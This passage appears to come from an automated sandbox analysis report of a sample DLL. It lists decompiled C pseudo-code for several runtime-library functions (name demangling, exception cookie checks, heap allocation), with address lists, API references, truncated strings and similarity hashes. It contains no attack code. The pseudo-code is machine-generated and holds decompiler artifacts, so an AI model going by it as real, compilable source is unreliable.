						_t135 = _t72 + _t236;
						_t261 = _t135;
						 *0x6e218984 = _t135;
					}
					 *(_t237 - 4) = 1;
					E6E17E7B1(_t261);
					 *(_t237 - 4) =  *(_t237 - 4) | 0xffffffff;
					E6E17FB57(_t237 - 0x28);
					return E6E1A9D9D(_t225, _t158, _t225, _t236);
				}
			}

0x6e17e0c5
0x6e17e0cc
0x6e17e0d1
0x6e17e0d7
0x6e17e0df
0x6e17e0e4
0x6e17e0ed
0x6e17e0f0
0x6e17e0f5
0x6e17e0f8
0x6e17e0fa
0x6e17e0fd
0x6e17e102
0x6e17e109
0x6e17e10d
0x6e17e117
0x6e17e119
0x6e17e11e
0x6e17e129
0x6e17e12b
0x6e17e131
0x6e17e131
0x6e17e133
0x6e17e136
0x6e17e136
0x6e17e144
0x6e17e145
0x6e17e14a
0x6e17e14d
0x6e17e153
0x6e17e155
0x6e17e15a
0x6e17e160
0x6e17e167
0x6e17e16a
0x6e17e171
0x6e17e176
0x6e17e17c
0x6e17e17d
0x6e17e184
0x6e17e184
0x6e17e189
0x6e17e193
0x6e17e198
0x6e17e19d
0x6e17e1ae
0x6e17e1b1
0x6e17e1b6
0x6e17e1bd
0x6e17e1bf
0x6e17e1c5
0x6e17e1c8
0x6e17e1cb
0x6e17e1ce
0x6e17e1d1
0x6e17e1d7
0x00000000
0x6e17e1e0
0x6e17e1e3
0x6e17e217
0x00000000
0x6e17e1e5
0x6e17e1e5
0x6e17e1ee
0x6e17e1f1
0x6e17e1fa
0x6e17e201
0x6e17e204
0x6e17e206
0x6e17e20c
0x6e17e20e
0x6e17e211
0x6e17e21a
0x6e17e21a
0x6e17e21b
0x6e17e224
0x6e17e1dd
0x00000000
0x6e17e1dd
0x6e17e224
0x6e17e20c
0x6e17e229
0x6e17e22d
0x6e17e239
0x6e17e23e
0x6e17e250
0x6e17e255
0x6e17e25a
0x6e17e261
0x6e17e269
0x6e17e26a
0x6e17e26c
0x6e17e272
0x6e17e279
0x6e17e27e
0x6e17e287
0x6e17e28c
0x6e17e297
0x6e17e299
0x6e17e29f
0x6e17e29f
0x6e17e2a2
0x6e17e2a5
0x6e17e2a5
0x6e17e2aa
0x6e17e2af
0x6e17e2ba
0x6e17e2bc
0x6e17e2c5
0x6e17e2c9
0x6e17e2ca
0x6e17e2d3
0x6e17e2d8
0x6e17e2dd
0x6e17e2e2
0x6e17e2ed
0x6e17e2f2
0x6e17e2f8
0x6e17e2fb
0x6e17e2fe
0x6e17e301
0x6e17e304
0x6e17e307
0x6e17e30e
0x6e17e311
0x6e17e317
0x6e17e319
0x6e17e31e
0x6e17e321
0x6e17e328
0x6e17e32d
0x6e17e336
0x6e17e33b
0x6e17e345
0x6e17e348
0x6e17e348
0x6e17e34e
0x6e17e351
0x6e17e356
0x6e17e35f
0x6e17e363
0x6e17e369
0x6e17e371
0x6e17e372
0x6e17e374
0x6e17e37b
0x6e17e37b
0x6e17e383
0x6e17e38e
0x6e17e397
0x6e17e39d
0x6e17e39f
0x6e17e3a9
0x6e17e3ac
0x6e17e3b2
0x6e17e3b5
0x6e17e3bc
0x6e17e3be
0x6e17e3c3
0x6e17e3ef
0x6e17e3c5
0x6e17e3c8
0x6e17e3d2
0x6e17e3d7
0x6e17e3e1
0x6e17e3e4
0x6e17e3e4
0x6e17e3f2
0x6e17e3f5
0x6e17e404
0x6e17e408
0x6e17e40a
0x6e17e418
0x6e17e420
0x6e17e426
0x6e17e42b
0x6e17e435
0x6e17e437
0x6e17e43a
0x6e17e43a
0x6e17e43c
0x6e17e43c
0x6e17e441
0x6e17e448
0x6e17e44d
0x6e17e454
0x6e17e460
0x6e17e460

APIs

__EH_prolog3_GS.LIBCMT ref: 6E17E0CC

Strings

Run phra, xrefs: 6E17E24B
office b, xrefs: 6E17E17F
(Hundre)(.*), xrefs: 6E17E2D3
Protec, xrefs: 6E17E376
(Get M, xrefs: 6E17E145

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3_
String ID: (Get M$(Hundre)(.*)$Protec$Run phra$office b
API String ID: 2427045233-1334055873
Opcode ID: 96d6ad8f516ee8aa8afbdc21e2adf6b18350c392d254c20a53da2aaba7a308d6
Instruction ID: bc14c9865b1bb1fcb6a0bb4ecca8d286d859934369be3183ea575652c97b5e2f
Opcode Fuzzy Hash: 96d6ad8f516ee8aa8afbdc21e2adf6b18350c392d254c20a53da2aaba7a308d6
Instruction Fuzzy Hash: 80B1B3B2E015158FCF18CFACC9995EDBBF6BB4A300B18422AE551E7780DB309A41DB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B0FD1, Relevance: 10.7, APIs: 7, Instructions: 151
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E1B0FD1(void* __ebx, intOrPtr* _a4, intOrPtr* _a8) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				char _v28;
				char _v36;
				char _v44;
				void* __edi;
				char* _t50;
				void* _t54;
				intOrPtr* _t57;
				void* _t62;
				intOrPtr* _t68;
				intOrPtr* _t69;
				char* _t73;
				void* _t77;
				void* _t78;
				intOrPtr* _t83;
				char* _t88;
				intOrPtr* _t104;
				void* _t108;
				void* _t113;
				char _t115;
				void* _t118;
				void* _t119;
				void* _t123;

				_t50 =  *0x6e221b68; // 0x0
				_t119 = _t118 - 0x28;
				if( *_t50 == 0) {
					_t51 = _a8;
					_t115 = 0;
					if( *_a8 == 0) {
						goto L16;
					} else {
						_v28 = ")[";
						_v24 = 2;
						_t54 = E6E1AFBF3(E6E1AFB6B(E6E1AFB1E(_t85,  &_v44, 0x28, _t51),  &_v36,  &_v28),  &_v20, 1);
						_t88 =  &_v12;
						goto L17;
					}
					L21:
				} else {
					_t113 = E6E1B2F7C();
					_t123 = _t113;
					if(_t123 < 0 || _t123 == 0) {
						_t115 = 0;
						L16:
						_v12 = _t115;
						_v8 = _t115;
						E6E1B0C7F( &_v12, 0x5b);
						_t54 = E6E1AFBF3( &_v12,  &_v44, 1);
						_t88 =  &_v36;
						L17:
						E6E1B1229(_a4, E6E1AFBAF(_t54, _t88, 0x5d));
						_t57 = _a4;
					} else {
						_t83 = _a8;
						_v12 = 0;
						_v8 = 0;
						if(( *(_t83 + 4) & 0x00000800) == 0) {
							L5:
							_t62 = _t113;
							_t113 = _t113 - 1;
							if(_t62 != 0) {
								_t73 =  *0x6e221b68; // 0x0
								if( *_t73 != 0) {
									_t77 = E6E1AFB1E(_t85,  &_v36, 0x5b, E6E1B22EF(_t108, _t113,  &_v20, 0));
									_t119 = _t119 + 0x14;
									_t78 = E6E1AFBAF(_t77,  &_v44, 0x5d);
									_t85 =  &_v12;
									E6E1AFC87( &_v12, _t78);
									goto L8;
								}
							}
						} else {
							_v20 = 0x6e1f2c0c;
							_t85 =  &_v12;
							_v16 = 2;
							E6E1AFC2F( &_v12,  &_v20);
							L8:
							if(_v8 <= 1) {
								goto L5;
							}
						}
						if( *_t83 != 0) {
							if(( *(_t83 + 4) & 0x00000800) == 0) {
								_t68 = E6E1AFBAF(E6E1AFB1E(_t85,  &_v44, 0x28, _t83),  &_v36, 0x29);
								_push( &_v12);
								_push( &_v20);
								_t104 = _t68;
							} else {
								_t104 = _t83;
								_push( &_v12);
								_push( &_v44);
							}
							_t69 = E6E1AFB8D(_t104);
							_v12 =  *_t69;
							_v8 =  *((intOrPtr*)(_t69 + 4));
						}
						E6E1B36B9(_t83,  &_v28,  &_v12);
						_t57 = _a4;
						 *_t57 = _v28;
						 *(_t57 + 4) = _v24 | 0x00000800;
					}
				}
				return _t57;
				goto L21;
			}

0x6e1b0fd4
0x6e1b0fd9
0x6e1b0fe1
0x6e1b1127
0x6e1b112a
0x6e1b112e
0x00000000
0x6e1b1130
0x6e1b1134
0x6e1b113e
0x6e1b1164
0x6e1b1169
0x00000000
0x6e1b1169
0x00000000
0x6e1b0fe7
0x6e1b0fec
0x6e1b0fee
0x6e1b0ff0
0x6e1b10e8
0x6e1b10ea
0x6e1b10ef
0x6e1b10f2
0x6e1b10f5
0x6e1b1103
0x6e1b1108
0x6e1b110b
0x6e1b1119
0x6e1b111e
0x6e1b0ffc
0x6e1b0ffd
0x6e1b1002
0x6e1b1005
0x6e1b100f
0x6e1b102d
0x6e1b102d
0x6e1b102f
0x6e1b1032
0x6e1b1034
0x6e1b103c
0x6e1b104f
0x6e1b1054
0x6e1b105f
0x6e1b1065
0x6e1b1068
0x00000000
0x6e1b1068
0x6e1b103c
0x6e1b1011
0x6e1b1014
0x6e1b101c
0x6e1b101f
0x6e1b1026
0x6e1b106d
0x6e1b1071
0x00000000
0x00000000
0x6e1b1071
0x6e1b1075
0x6e1b107e
0x6e1b10a3
0x6e1b10ab
0x6e1b10af
0x6e1b10b0
0x6e1b1080
0x6e1b1083
0x6e1b1085
0x6e1b1089
0x6e1b1089
0x6e1b10b2
0x6e1b10b9
0x6e1b10bf
0x6e1b10bf
0x6e1b10ca
0x6e1b10cf
0x6e1b10e0
0x6e1b10e2
0x6e1b10e5
0x6e1b0ff0
0x6e1b1126
0x00000000

APIs

DName::operator+.LIBCMT ref: 6E1B105F
DName::operator+.LIBCMT ref: 6E1B10B2

Part of subcall function 6E1AFC2F: shared_ptr.LIBCMT ref: 6E1AFC4B

Part of subcall function 6E1AFB1E: DName::operator+.LIBCMT ref: 6E1AFB3F

DName::operator+.LIBCMT ref: 6E1B10A3
DName::operator+.LIBCMT ref: 6E1B1103
DName::operator+.LIBCMT ref: 6E1B1110
DName::operator+.LIBCMT ref: 6E1B1157
DName::operator+.LIBCMT ref: 6E1B1164

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator+$shared_ptr
String ID:
API String ID: 1037112749-0
Opcode ID: 77d6ad3d94415078b93f615d011700fbcb1fbe5ce352c1b52d478b731ef9b764
Instruction ID: 112ed507432481d9ca23d8d96351868a2c5101466f09683308e7ed06b094b78e
Opcode Fuzzy Hash: 77d6ad3d94415078b93f615d011700fbcb1fbe5ce352c1b52d478b731ef9b764
Instruction Fuzzy Hash: 175162B5E00209AFDF05DBD8D855EEEBBBCBF1C700F11445AE515A7180EB709A88DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1ADEA0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E6E1ADEA0(void* __ebx, void* __ecx, void* __edi, void* __eflags, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				long _v40;
				void* __esi;
				char _t53;
				signed int _t60;
				intOrPtr _t61;
				void* _t62;
				intOrPtr* _t63;
				intOrPtr _t65;
				void* _t68;
				long _t72;
				intOrPtr* _t76;
				intOrPtr _t77;
				intOrPtr _t79;
				signed int _t82;
				char _t84;
				intOrPtr _t97;
				intOrPtr _t100;
				long _t102;
				long _t104;
				void* _t105;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t112;
				void* _t119;

				_t76 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t76 = E6E1E914E(__ecx,  *_t76);
				_t77 = _a8;
				_t6 = _t77 + 0x10; // 0x11
				_t100 = _t6;
				_push(_t100);
				_v20 = _t100;
				_v12 =  *(_t77 + 8) ^  *0x6e21801c;
				E6E1ADE60(__edi, _t100,  *(_t77 + 8) ^  *0x6e21801c);
				E6E1AF227(_a12);
				_t53 = _a4;
				_t112 = _t111 + 0x10;
				_t97 =  *((intOrPtr*)(_t77 + 0xc));
				if(( *(_t53 + 4) & 0x00000066) != 0) {
					__eflags = _t97 - 0xfffffffe;
					if(_t97 != 0xfffffffe) {
						E6E1AF4AC(_t77, 0xfffffffe, _t100, 0x6e21801c);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t53;
					_v28 = _a12;
					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
					if(_t97 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t82 = _v12;
							_t60 = _t97 + (_t97 + 2) * 2;
							_t79 =  *((intOrPtr*)(_t82 + _t60 * 4));
							_t61 = _t82 + _t60 * 4;
							_t83 =  *((intOrPtr*)(_t61 + 4));
							_v24 = _t61;
							if( *((intOrPtr*)(_t61 + 4)) == 0) {
								_t84 = _v5;
								goto L7;
							} else {
								_t62 = E6E1AF45C(_t83, _t100);
								_t84 = 1;
								_v5 = 1;
								_t119 = _t62;
								if(_t119 < 0) {
									_v16 = 0;
									L13:
									_push(_t100);
									E6E1ADE60(_t97, _t100, _v12);
									goto L14;
								} else {
									if(_t119 > 0) {
										_t63 = _a4;
										__eflags =  *_t63 - 0xe06d7363;
										if( *_t63 == 0xe06d7363) {
											__eflags =  *0x6e1f2798;
											if(__eflags != 0) {
												_t72 = E6E1E8920(__eflags, 0x6e1f2798);
												_t112 = _t112 + 4;
												__eflags = _t72;
												if(_t72 != 0) {
													_t104 =  *0x6e1f2798; // 0x6e1adb27
													 *0x6e1ee1b4(_a4, 1);
													 *_t104();
													_t100 = _v20;
													_t112 = _t112 + 8;
												}
												_t63 = _a4;
											}
										}
										E6E1AF490(_t63, _a8, _t63);
										_t65 = _a8;
										__eflags =  *((intOrPtr*)(_t65 + 0xc)) - _t97;
										if( *((intOrPtr*)(_t65 + 0xc)) != _t97) {
											E6E1AF4AC(_t65, _t97, _t100, 0x6e21801c);
											_t65 = _a8;
										}
										_push(_t100);
										 *((intOrPtr*)(_t65 + 0xc)) = _t79;
										E6E1ADE60(_t97, _t100, _v16);
										E6E1AF474();
										asm("int3");
										_t107 = _t105;
										_t109 = _t107;
										_push(_t109);
										_push(_t100);
										_t102 = _v40;
										__eflags = _t102 - 0xffffffe0;
										if(__eflags > 0) {
											L31:
											 *((intOrPtr*)(E6E1C23F4(__eflags))) = 0xc;
											_t68 = 0;
											__eflags = 0;
										} else {
											__eflags = _t102;
											if(_t102 == 0) {
												_t102 = _t102 + 1;
											}
											while(1) {
												_t68 = HeapAlloc( *0x6e222494, 0, _t102);
												__eflags = _t68;
												if(_t68 != 0) {
													break;
												}
												__eflags = E6E1DFA43();
												if(__eflags == 0) {
													goto L31;
												} else {
													__eflags = E6E1CD4F6(__eflags, _t102);
													if(__eflags == 0) {
														goto L31;
													} else {
														continue;
													}
												}
												goto L32;
											}
										}
										L32:
										return _t68;
									} else {
										goto L7;
									}
								}
							}
							goto L33;
							L7:
							_t97 = _t79;
						} while (_t79 != 0xfffffffe);
						if(_t84 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L33:
			}

0x6e1adea7
0x6e1adeab
0x6e1adeac
0x6e1adeb2
0x6e1adebe
0x6e1adec0
0x6e1adec6
0x6e1adec6
0x6e1adecf
0x6e1aded1
0x6e1aded4
0x6e1aded7
0x6e1adedf
0x6e1adee4
0x6e1adee7
0x6e1adeea
0x6e1adef1
0x6e1adf4d
0x6e1adf50
0x6e1adf5f
0x00000000
0x6e1adf5f
0x00000000
0x6e1adef3
0x6e1adef3
0x6e1adef9
0x6e1adeff
0x6e1adf05
0x6e1adf70
0x6e1adf79
0x6e1adf07
0x6e1adf07
0x6e1adf07
0x6e1adf0d
0x6e1adf10
0x6e1adf13
0x6e1adf16
0x6e1adf19
0x6e1adf1e
0x6e1adf34
0x00000000
0x6e1adf20
0x6e1adf22
0x6e1adf27
0x6e1adf29
0x6e1adf2c
0x6e1adf2e
0x6e1adf44
0x6e1adf64
0x6e1adf64
0x6e1adf68
0x00000000
0x6e1adf30
0x6e1adf30
0x6e1adf7a
0x6e1adf7d
0x6e1adf83
0x6e1adf85
0x6e1adf8c
0x6e1adf93
0x6e1adf98
0x6e1adf9b
0x6e1adf9d
0x6e1adf9f
0x6e1adfac
0x6e1adfb2
0x6e1adfb4
0x6e1adfb7
0x6e1adfb7
0x6e1adfba
0x6e1adfba
0x6e1adf8c
0x6e1adfc2
0x6e1adfc7
0x6e1adfca
0x6e1adfcd
0x6e1adfd9
0x6e1adfde
0x6e1adfde
0x6e1adfe1
0x6e1adfe5
0x6e1adfe8
0x6e1adff8
0x6e1adffd
0x6e1ae001
0x6e1c2375
0x6e1d1c20
0x6e1d1c23
0x6e1d1c24
0x6e1d1c27
0x6e1d1c2a
0x6e1d1c5c
0x6e1d1c61
0x6e1d1c67
0x6e1d1c67
0x6e1d1c2c
0x6e1d1c2c
0x6e1d1c2e
0x6e1d1c30
0x6e1d1c30
0x6e1d1c47
0x6e1d1c50
0x6e1d1c56
0x6e1d1c58
0x00000000
0x00000000
0x6e1d1c38
0x6e1d1c3a
0x00000000
0x6e1d1c3c
0x6e1d1c43
0x6e1d1c45
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1d1c45
0x00000000
0x6e1d1c3a
0x6e1d1c5a
0x6e1d1c69
0x6e1d1c6b
0x6e1adf32
0x00000000
0x6e1adf32
0x6e1adf30
0x6e1adf2e
0x00000000
0x6e1adf37
0x6e1adf37
0x6e1adf39
0x6e1adf40
0x00000000
0x6e1adf42
0x00000000
0x6e1adf40
0x6e1adf05
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 6E1ADED7
___except_validate_context_record.LIBVCRUNTIME ref: 6E1ADEDF
_ValidateLocalCookies.LIBCMT ref: 6E1ADF68
__IsNonwritableInCurrentImage.LIBCMT ref: 6E1ADF93
_ValidateLocalCookies.LIBCMT ref: 6E1ADFE8

Strings

csm, xrefs: 6E1ADF7D

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: b9cbfebb7630fb71d21fe2eb575e2488e652b5e755d9b4fc1462434a2ad97108
Instruction ID: aa48628896dd242782f329c73316c6e3243c23cd2615213c97d940545d00e8fd
Opcode Fuzzy Hash: b9cbfebb7630fb71d21fe2eb575e2488e652b5e755d9b4fc1462434a2ad97108
Instruction Fuzzy Hash: 1F419638A046099BCF00DFACC884AEEBBB5AF5532CF108155EE259B351D731DA82DF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B22EF, Relevance: 10.6, APIs: 7, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E6E1B22EF(void* __edx, void* __edi, intOrPtr* _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				intOrPtr _v40;
				char _v44;
				void* __ebx;
				void* __esi;
				intOrPtr _t24;
				char* _t27;
				intOrPtr* _t28;
				intOrPtr* _t29;
				void* _t30;
				intOrPtr _t33;
				char _t38;
				intOrPtr* _t40;
				char _t42;
				char* _t45;
				char* _t46;
				void* _t55;
				intOrPtr* _t56;
				void* _t57;
				void* _t58;

				_t57 = __edi;
				_t55 = __edx;
				_t40 =  *0x6e221b68; // 0x0
				_t38 = 0;
				if( *_t40 == 0x51) {
					_t38 = 1;
					_t40 = _t40 + 1;
					 *0x6e221b68 = _t40;
				}
				_t24 =  *_t40;
				if(_t24 != 0) {
					_push(_t58);
					if(_t24 < 0x30 || _t24 > 0x39) {
						E6E1B50FA(_t40,  &_v44);
						if(_v36 == 0) {
							_t27 =  *0x6e221b68; // 0x0
							if( *_t27 != 0) {
								_t42 = 0;
								_v8 = 2;
								_v12 = 0;
								_t56 =  &_v12;
							} else {
								_t29 = E6E1AF804( &_v36, 1);
								goto L22;
							}
						} else {
							_push(_v40);
							 *0x6e221b68 =  *0x6e221b68 + 1;
							_push(_v44);
							if(_a8 == 0) {
								if(_t38 == 0) {
									_t45 =  &_v20;
									goto L11;
								} else {
									_t46 =  &_v36;
									goto L8;
								}
							} else {
								if(_t38 == 0) {
									_t29 = E6E1AF844(_t38,  &_v20, _t57, _t58);
									goto L22;
								} else {
									_t30 = E6E1AF844(_t38,  &_v36, _t57, _t58);
									goto L9;
								}
							}
							goto L23;
						}
					} else {
						_t33 = _t24;
						if(_t38 == 0) {
							asm("cdq");
							asm("adc edx, 0xffffffff");
							_push(_t55);
							 *0x6e221b68 = _t40 + 1;
							_t45 =  &_v36;
							_push(_t33 + 0xffffffd1);
							L11:
							_t29 = E6E1AF8D0(_t38, _t45, _t57, _t58);
							L22:
							_t56 = _t29;
						} else {
							asm("cdq");
							_push(_t55);
							 *0x6e221b68 = _t40 + 1;
							_t46 =  &_v20;
							_push(_t33 - 0x2f);
							L8:
							_t30 = E6E1AF8D0(_t38, _t46, _t57, _t58);
							L9:
							E6E1AFB8D(E6E1AF764( &_v28, 0x6e218050),  &_v12, _t30);
							_t56 =  &_v12;
						}
						L23:
						_t42 =  *_t56;
					}
					_t28 = _a4;
					 *_t28 = _t42;
					_t22 = _t56 + 4; // 0x40006e22
					 *((intOrPtr*)(_t28 + 4)) =  *_t22;
				} else {
					E6E1AF804(_a4, 1);
					_t28 = _a4;
				}
				return _t28;
			}

0x6e1b22ef
0x6e1b22ef
0x6e1b22f2
0x6e1b22fc
0x6e1b2301
0x6e1b2303
0x6e1b2305
0x6e1b2306
0x6e1b2306
0x6e1b230c
0x6e1b2310
0x6e1b2324
0x6e1b2327
0x6e1b2387
0x6e1b2391
0x6e1b23ce
0x6e1b23d6
0x6e1b23e8
0x6e1b23ea
0x6e1b23f1
0x6e1b23f4
0x6e1b23d8
0x6e1b23dd
0x00000000
0x6e1b23dd
0x6e1b2393
0x6e1b2393
0x6e1b2396
0x6e1b23a0
0x6e1b23a3
0x6e1b23bf
0x6e1b23c9
0x00000000
0x6e1b23c1
0x6e1b23c1
0x00000000
0x6e1b23c1
0x6e1b23a5
0x6e1b23a7
0x6e1b23b6
0x00000000
0x6e1b23a9
0x6e1b23ac
0x00000000
0x6e1b23ac
0x6e1b23a7
0x00000000
0x6e1b23a3
0x6e1b232d
0x6e1b232d
0x6e1b2332
0x6e1b2369
0x6e1b236d
0x6e1b2371
0x6e1b2372
0x6e1b2378
0x6e1b237b
0x6e1b237c
0x6e1b237c
0x6e1b23e2
0x6e1b23e2
0x6e1b2334
0x6e1b2338
0x6e1b2339
0x6e1b233a
0x6e1b2340
0x6e1b2343
0x6e1b2344
0x6e1b2344
0x6e1b2349
0x6e1b235f
0x6e1b2364
0x6e1b2364
0x6e1b23e4
0x6e1b23e4
0x6e1b23e4
0x6e1b23f7
0x6e1b23fb
0x6e1b23fd
0x6e1b2400
0x6e1b2312
0x6e1b2317
0x6e1b231c
0x6e1b231c
0x6e1b2405

APIs

DName::DName.LIBVCRUNTIME ref: 6E1B2317
DName::DName.LIBVCRUNTIME ref: 6E1B2344

Part of subcall function 6E1AF8D0: __aulldvrm.LIBCMT ref: 6E1AF901

DName::operator+.LIBCMT ref: 6E1B235F
DName::DName.LIBVCRUNTIME ref: 6E1B237C
DName::DName.LIBVCRUNTIME ref: 6E1B23AC
DName::DName.LIBVCRUNTIME ref: 6E1B23B6
DName::DName.LIBVCRUNTIME ref: 6E1B23DD

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: NameName::$Name::operator+__aulldvrm
String ID:
API String ID: 4069495278-0
Opcode ID: 092dd1dcd2f05588bcb3cb176f7b61f72f1f56d14de5701de59470f4815568ba
Instruction ID: 8abee388382ea1317516e42fc794f6e3ccfa4fa6e2af448737a23f657b75a393
Opcode Fuzzy Hash: 092dd1dcd2f05588bcb3cb176f7b61f72f1f56d14de5701de59470f4815568ba
Instruction Fuzzy Hash: 9C31D4758442489EDF08CFE8C8A0AED7BB9BF1E314F20445DE5526B1A0E77599CDEB20

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B2947, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6E1B2947(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				char _v76;
				char _v80;
				long long _v84;
				char _v92;
				char _v96;
				void* _v100;
				signed int _t24;
				intOrPtr _t26;
				char* _t29;
				intOrPtr* _t30;
				intOrPtr* _t45;
				void* _t46;
				long long _t47;
				intOrPtr* _t58;
				signed int _t59;
				long long* _t60;
				long long _t64;

				_t24 =  *0x6e21801c; // 0x57d971a9
				_v8 = _t24 ^ _t59;
				_t45 =  *0x6e221b68; // 0x0
				_t58 = _a4;
				_t26 =  *_t45;
				if(_t26 != 0) {
					if(_t26 < 0x30 || _t26 > 0x39) {
						E6E1B50FA(_t45,  &_v100);
						_pop(_t46);
						if(_v92 == 0) {
							L11:
							_t29 =  *0x6e221b68; // 0x0
							if( *_t29 != 0) {
								_t47 = 0;
								_v80 = 2;
								_v84 = 0;
								_t30 =  &_v84;
							} else {
								_t30 = E6E1AF804( &_v84, 1);
								_t47 =  *_t30;
							}
							 *_t58 = _t47;
							 *((intOrPtr*)(_t58 + 4)) =  *((intOrPtr*)(_t30 + 4));
						} else {
							_v84 = _v100;
							_v80 = _v96;
							if(_a8 != 0x42) {
								if(_a8 != 0x41) {
									goto L11;
								} else {
									_t64 = _v84;
									goto L8;
								}
							} else {
								_t64 = _v84;
								L8:
								_push(_t46);
								 *_t60 = _t64;
								E6E161238( &_v76, 0x41, "%lf", _t46);
								_v80 = 0;
								_push(_v80);
								E6E1AF511(_t58,  &_v76);
							}
						}
					} else {
						asm("cdq");
						 *0x6e221b68 = _t45 + 1;
						E6E1AF8D0(__ebx, _t58, __edi, _t58, _t26 - 0x2f, __edx);
					}
				} else {
					E6E1AF804(_t58, 1);
				}
				return E6E1A93EA(_v8 ^ _t59);
			}

0x6e1b294d
0x6e1b2954
0x6e1b2957
0x6e1b295e
0x6e1b2961
0x6e1b2965
0x6e1b2977
0x6e1b299d
0x6e1b29a6
0x6e1b29a7
0x6e1b29f5
0x6e1b29f5
0x6e1b29fd
0x6e1b2a0d
0x6e1b2a0f
0x6e1b2a16
0x6e1b2a19
0x6e1b29ff
0x6e1b2a04
0x6e1b2a09
0x6e1b2a09
0x6e1b2a1c
0x6e1b2a21
0x6e1b29a9
0x6e1b29b0
0x6e1b29b6
0x6e1b29b9
0x6e1b29ee
0x00000000
0x6e1b29f0
0x6e1b29f0
0x00000000
0x6e1b29f0
0x6e1b29bb
0x6e1b29bb
0x6e1b29be
0x6e1b29be
0x6e1b29c0
0x6e1b29ce
0x6e1b29d6
0x6e1b29df
0x6e1b29e3
0x6e1b29e3
0x6e1b29b9
0x6e1b297d
0x6e1b2984
0x6e1b2986
0x6e1b298f
0x6e1b298f
0x6e1b2967
0x6e1b296b
0x6e1b296b
0x6e1b2a32

APIs

DName::DName.LIBVCRUNTIME ref: 6E1B296B
DName::DName.LIBVCRUNTIME ref: 6E1B298F

Strings

A, xrefs: 6E1B29EA
%lf, xrefs: 6E1B29C3

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
